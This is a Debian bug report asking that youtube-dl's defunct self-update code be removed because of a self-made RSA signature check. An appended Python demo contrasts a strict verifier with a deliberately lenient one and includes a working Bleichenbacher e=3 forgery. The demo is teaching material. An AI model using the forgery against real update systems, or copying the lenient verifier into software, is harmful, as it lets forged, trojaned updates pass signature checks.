[Secure-testing-team] Bug#890119: youtube-dl contains a (possibly-insecure) self-update mechanism
Nicolas Braud-Santoni
2018-02-11 10:50:31 UTC
Package: youtube-dl
Version: 2018.01.27-1
Severity: important
Tags: security upstream jessie stretch buster sid

Hi,

youtube-dl ships a self-update mechanism, accessible through the `--update` option.
This mechanism seems (correctly) defunct on Debian systems, as it is gated by a

    $ youtube-dl --update
    It looks like you installed youtube-dl with a package manager, pip, setup.py or a tarball. Please use that to update.

However, it is not obvious how reliable this check is, and upstream's
self-upgrade mechanism relies on a self-made (and quite possibly insecure)
function for checking RSA signatures:

https://github.com/rg3/youtube-dl/blob/a072a12e249525f002646a921f16e14f03231662/youtube_dl/update.py#L17-L28


I suggest entirely removing the defunct option and corresponding code.


Best,

nicoo


-- System Information:
Debian Release: buster/sid
APT prefers testing
APT policy: (900, 'testing'), (500, 'unstable')
Architecture: amd64 (x86_64)
Foreign Architectures: i386

Kernel: Linux 4.14.0-3-amd64 (SMP w/4 CPU cores)
Locale: LANG=en_US.UTF-8, LC_CTYPE=en_US.UTF-8 (charmap=UTF-8) (ignored: LC_ALL set to en_US.UTF-8), LANGUAGE=en_US.UTF-8 (charmap=UTF-8) (ignored: LC_ALL set to en_US.UTF-8)
Shell: /bin/sh linked to /bin/dash
Init: systemd (via /run/systemd/system)
LSM: AppArmor: enabled

Versions of packages youtube-dl depends on:
ii dpkg 1.19.0.5
ii python3 3.6.4-1
ii python3-pkg-resources 38.4.0-1

Versions of packages youtube-dl recommends:
ii ca-certificates 20170717
ii curl 7.58.0-2
ii ffmpeg 7:3.4.1-1+b2
ii mpv 0.27.0-2+b3
pn phantomjs <none>
pn rtmpdump <none>
ii wget 1.19.4-1

youtube-dl suggests no packages.

-- no debconf information
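The report points at a hand-rolled RSA signature check in upstream's update.py without saying what, if anything, is wrong with it. The following Python is an added example, not youtube-dl's code and not Debian's, showing the classic way such checks go wrong: a PKCS#1 v1.5 verifier that parses the padding and then ignores whatever follows the hash is forgeable with a low public exponent and no private key (Bleichenbacher's 2006 e=3 attack), while a verifier that rebuilds the whole expected encoding and compares all of it is not. The key size, e=3, the deterministic seed and the "lenient" verifier are all assumptions constructed for the demo; a real updater should call a reviewed library such as the `cryptography` package rather than either function below.

```python
import hashlib
import random

# DigestInfo prefix for SHA-256 (RFC 8017, section 9.2, note 1)
SHA256_DIGESTINFO = bytes.fromhex("3031300d060960864801650304020105000420")
E = 3            # low public exponent: fine for RSA, fatal for a lenient verifier
KEY_BITS = 2048  # demo assumption; a 1024-bit key leaves too little slack for the forgery


def _is_probable_prime(n, rng, rounds=16):
    """Miller-Rabin after trial division by a few small primes."""
    for p in (2, 3, 5, 7, 11, 13, 17, 19, 23, 29, 31, 37):
        if n % p == 0:
            return n == p
    d, r = n - 1, 0
    while d % 2 == 0:
        d //= 2
        r += 1
    for _ in range(rounds):
        x = pow(rng.randrange(2, n - 1), d, n)
        if x in (1, n - 1):
            continue
        for _ in range(r - 1):
            x = pow(x, 2, n)
            if x == n - 1:
                break
        else:
            return False
    return True


def _random_prime(bits, rng):
    while True:
        cand = rng.getrandbits(bits) | (1 << (bits - 1)) | 1
        if cand % E != 1 and _is_probable_prime(cand, rng):  # gcd(E, p-1) must be 1
            return cand


def generate_key(seed=1):
    """Return (n, d). Seeded so the demo is reproducible; real keys use os.urandom."""
    rng = random.Random(seed)
    p = _random_prime(KEY_BITS // 2, rng)
    q = _random_prime(KEY_BITS // 2, rng)
    return p * q, pow(E, -1, (p - 1) * (q - 1))


def _k(n):
    return (n.bit_length() + 7) // 8  # modulus length in bytes


def emsa_pkcs1_v15(message, k):
    """EMSA-PKCS1-v1_5: 00 01 FF..FF 00 || DigestInfo || SHA-256(message), k bytes."""
    t = SHA256_DIGESTINFO + hashlib.sha256(message).digest()
    if k < len(t) + 11:
        raise ValueError("modulus too short for PKCS#1 v1.5 with SHA-256")
    return b"\x00\x01" + b"\xff" * (k - len(t) - 3) + b"\x00" + t


def sign(message, n, d):
    em = int.from_bytes(emsa_pkcs1_v15(message, _k(n)), "big")
    return pow(em, d, n).to_bytes(_k(n), "big")


def _recover(signature, n):
    """s^e mod n as a k-byte big-endian string (the recovered encoded message)."""
    return pow(int.from_bytes(signature, "big"), E, n).to_bytes(_k(n), "big")


def verify_strict(message, signature, n):
    """Correct check: rebuild the whole expected encoding and compare every byte."""
    k = _k(n)
    return len(signature) == k and _recover(signature, n) == emsa_pkcs1_v15(message, k)


def verify_lenient(message, signature, n):
    """Constructed bug: walk the padding, then accept the hash wherever the 00
    separator lands and never look at the bytes after it."""
    em = _recover(signature, n)
    if em[:2] != b"\x00\x01":
        return False
    i = 2
    while i < len(em) and em[i] == 0xFF:
        i += 1
    if i >= len(em) or em[i] != 0x00:
        return False
    expected = SHA256_DIGESTINFO + hashlib.sha256(message).digest()
    return em[i + 1:].startswith(expected)  # trailing bytes are never examined


def _icbrt(x):
    """Floor of the integer cube root (Newton's method from an overestimate)."""
    r = 1 << ((x.bit_length() + 2) // 3)
    while True:
        nr = (2 * r + x // (r * r)) // 3
        if nr >= r:
            return r
        r = nr


def forge(message, n):
    """e=3 forgery, no private key: encode with a single FF, put the DigestInfo
    right after the separator and leave the rest of the block free; the cube
    root of that block, rounded up, cubes to a value whose leading bytes are
    unchanged (and stays below n), so the lenient verifier accepts it."""
    k = _k(n)
    prefix = b"\x00\x01\xff\x00" + SHA256_DIGESTINFO + hashlib.sha256(message).digest()
    slack_bits = 8 * (k - len(prefix))
    target = int.from_bytes(prefix, "big") << slack_bits
    s = _icbrt(target) + 1                       # smallest s with s**3 >= target
    assert s ** 3 < target + (1 << slack_bits)   # still inside the free space
    return s.to_bytes(k, "big")


if __name__ == "__main__":
    n, d = generate_key()
    msg = b"youtube-dl 2018.02.11 release tarball"   # constructed sample message
    sig = sign(msg, n, d)
    print("legit,  strict :", verify_strict(msg, sig, n))    # True
    print("legit,  lenient:", verify_lenient(msg, sig, n))   # True
    bad = forge(b"trojaned update", n)
    print("forged, strict :", verify_strict(b"trojaned update", bad, n))   # False
    print("forged, lenient:", verify_lenient(b"trojaned update", bad, n))  # True
```

The point for a reviewer of any self-made verifier is the last line of `verify_strict`: the only safe comparison is of the complete k-byte encoding against one the verifier built itself. Anything that "parses" the padding, tolerates a variable number of FF bytes, or reads the hash out of the middle of the block is a candidate for the forgery above, which is exactly why the report asks for the code to be removed rather than audited and kept.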
